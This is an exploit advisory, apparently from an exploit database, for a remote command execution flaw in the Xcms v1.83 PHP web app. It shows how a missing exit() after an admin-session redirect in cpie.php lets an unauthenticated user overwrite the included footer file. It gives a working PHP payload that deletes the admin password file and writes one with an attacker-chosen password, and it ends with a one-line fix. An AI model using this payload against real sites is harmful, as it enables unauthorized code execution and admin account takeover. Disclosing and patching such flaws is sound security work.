Exploits / Vulnerability Discovered : 2023-04-01 |
Type : webapps |
Platform : php
This exploit / vulnerability Xcms v1.83 remote command execution (rce) is for educational purposes only and if it is used you will do on your own risk!
The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms.
Taking "home.php" for example:
<?php
//home.php
[...]
include(CSTR."footer".STR); // <- "CSTR" and "STR" are the constants previously declared. They refers to "/dati/generali" and "dtb"
?>
So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel.
So let's take a look to the bugged code.
<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- so miss an exit() :-D
[...]
if(isset($_POST['salva'])){
Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
}
[...]
?>
So with a simple html form we can change the footer.
Ex:
Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials.
Trick: We can change the admin panel password by inserting this code in the footer:
<?php
$pwd = "owned"; // <- Place here your new password.
$pwd2 = md5($pwd);
unlink("dati/generali/pass.php");
$f = fopen("dati/generali/pass.php",w);
fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>");
fclose($f);
?>
This code delete the old password file and then create a new one with your new password.
Fix:
<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug.
[...]
if(isset($_POST['salva'])){
Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
}
[...]
?>